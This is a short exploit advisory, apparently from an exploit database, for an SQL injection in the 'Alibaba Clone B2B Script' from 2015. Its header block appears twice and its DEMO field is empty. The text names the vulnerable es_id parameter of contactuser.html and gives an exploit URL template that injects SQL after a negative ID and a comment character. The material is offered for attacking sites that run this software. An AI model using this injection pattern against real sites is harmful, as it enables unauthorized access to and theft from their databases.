Alibaba Clone B2B Script
Sql Injection Vulnerability
Description:
# Exploit Title: Alibaba Clone B2B Script Sql Injection All Versions
# Date: 2015-08-31
# Exploit Author: Meisam Monsef meisamrce
# Vendor Homepage: http://www.superbscripts.com/
# Version: All Versions
# Tested on: CentOS and Windows
# Exploit Title: Alibaba Clone B2B Script Sql Injection All Versions
# Date: 2015-08-31
# Exploit Author: Meisam Monsef meisamrce
# Vendor Homepage: http://www.superbscripts.com/
# Version: All Versions
# Tested on: CentOS and Windows
POC:
/contactuser.html?es_type=4&es_id=
EXPLOIT:
http:
//site.com/contactuser.html?es_type=4&es_id=-9999+[sql+command]+%23
DEMO: